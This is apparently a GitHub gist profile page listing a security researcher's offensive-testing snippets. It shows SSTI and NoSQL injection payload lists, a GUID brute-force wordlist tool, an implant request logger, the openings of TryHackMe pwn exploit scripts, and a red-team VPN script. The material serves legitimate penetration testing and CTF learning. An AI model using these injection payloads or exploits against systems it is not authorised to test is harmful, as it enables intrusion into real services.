Skip to content

Instantly share code, notes, and snippets.

View DanaEpp's full-sized avatar
☠️
Flippin' duh bits. Dumping core.

Dana Epp DanaEpp

☠️
Flippin' duh bits. Dumping core.
57 followers · 1 following
View GitHub Profile
@DanaEpp
DanaEpp / txt_to_postman_b64_json.py
Created March 27, 2024 20:58
A simple Python script that will convert and encode a Big List of Naughty Strings (BLNS) into a JSON file that Postman can use
#!/usr/bin/env python3
from argparse import ArgumentParser, Namespace
import os
import base64
import json
def main(srcFile: str, dstFile:str) -> None:
if not os.path.isfile(srcFile):
@DanaEpp
DanaEpp / ssti-payloads.txt
Created August 22, 2023 22:31
SSTI template expression payloads
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
*{7*7}
@DanaEpp
DanaEpp / request_logger.py
Last active August 11, 2023 14:55
Implant Request Logger
#!/bin/env python3
"""
request_logger.py
A simple HTTP server that will dump the requests being mirrored from an implant on an API server
WARNING: This will record all header and body content of a request to a JSON file. To reduce the risk of
information disclosure, care should be placed in the ACL of the output file.
@DanaEpp
DanaEpp / dump-endpoints.jq
Created November 26, 2022 00:05
jq query and filter to dump the HTTP method, route and description of every endpoint in an OpenAPI 3.0 document. Usage: jq -r -f dump-endpoints.jq openapidoc.json
.paths | to_entries | map(select(.key | test("^x-") | not)) | map ( .key as $path | .value | to_entries | map( select( .key | IN("get", "put", "post", "delete", "options", "head", "patch", "trace")) | { method: .key, path: $path, summary: .value.summary?, deprecated: .value.deprecated? })[] ) | map( .method + "\t" + .path + "\t" + .summary + (if .deprecated then " (deprecated)" else "" end)) []
@DanaEpp
DanaEpp / guid_reaper.py
Created October 20, 2022 17:56
Tool to dump v1 GUIDs and generate a wordlist of GUIDs for use in bruteforce attacks against APIs with predictable GUIDs
#!/bin/env python3
import argparse
import datetime
import re
import sys
import uuid
###############################################################################
# Based off of Daniel Thatcher's guid tool
@DanaEpp
DanaEpp / nosql-injection-payloads-for-postman.json
Created September 20, 2022 22:18
NoSQL injection payloads for Postman
[
{"payload":"'"},
{"payload":"''"},
{"payload":";%00"},
{"payload":"--"},
{"payload":"-- -"},
{"payload":"\"\""},
{"payload":";"},
{"payload":"' OR '1"},
{"payload":"' OR 1 -- -"},
@DanaEpp
DanaEpp / thm-dump.py
Created June 26, 2022 05:18
TryHackMe (THM) dump script to find rooms with open tasks
#!/bin/env python3
import getpass
import time
import requests
from requests.cookies import create_cookie
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
import re
from typing import List
@DanaEpp
DanaEpp / exploit110.py
Last active May 10, 2022 23:43
THM PWN 101 - Challenge 10 (optimized using pwntools native ROP() chains)
#!/bin/env python3
import sys
from pwn import *
exe = "./pwn110.pwn110"
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
def start(argv=[], *a, **kw):
@DanaEpp
DanaEpp / gist:18500ab8c14893da46ae095678a12f43
Last active May 7, 2022 22:10
THM PWN 101 - Challenge 9 (optimized using pwntools native ROP() chains)
#!/bin/env python3
import sys
from pwn import *
exe = "./pwn109.pwn109"
elf = context.binary = ELF(exe, checksec=False)
context.log_level = 'info'
def start(argv=[], *a, **kw):
@DanaEpp
DanaEpp / setup_vpn.sh
Created May 12, 2021 22:26
My disposable VPN script I use during external #redteam engagements
#!/bin/bash
# Author: Dana Epp (@danaepp)
GROUP_NAME="DisposableVPN"
VM_NAME="DisposableVPN"
REGION="canadacentral"
PORT="51820"
echo "Creating resource group '$GROUP_NAME'..."